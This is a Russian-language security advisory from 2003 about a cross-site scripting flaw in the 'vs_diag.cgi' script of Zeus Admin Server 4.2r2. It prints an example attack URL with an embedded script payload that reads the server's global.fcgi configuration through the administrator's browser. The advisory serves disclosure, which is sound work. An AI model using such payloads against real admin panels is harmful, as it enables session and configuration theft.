Сценарий 'vs_diag.cgi' позволяет удаленному пользователю выполнять XSS нападение в Zeus Admin Server

Дата публикации:
02.06.2003
Всего просмотров:
1288
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость в проверке правильности ввода обнаружена в Zeus Admin Server в 'vs_diag.cgi' сценарии. Удаленный пользователь может выполнить XSS нападение против администратора сервера.

Сообщается, что сценарий 'vs_diag.cgi' не фильтрует HTML код в данных, представленных пользователем.

Удаленный пользователь может сконструировать специально обработанный URL, при загрузке которого администратором, выполнится произвольный код сценария в браузере целевого администратора, в контексте безопасности Zeus Admin сервера. Уязвимость может использоваться для кражи опознавательных данных, хранящихся в куки целевого администратора. Пример:

http://<target>:9090/apps/web/vs_diag.cgi?server=<YOUR_CODE>

http://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo()
{var%20 xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open
("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send
();xmlDoc=xmlHttp.responseTex t;document.write(xmlDoc);}pedo();alert("Have%
20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%
20this%20info!%20Much%20more%20evil%20actions% 20are%20possible...")
</script>
Уязвимость обнаружена в Zeus Admin Server 4.2r2

Ссылки: Another ZEUS Server web admin XSS!
или введите имя

CAPTCHA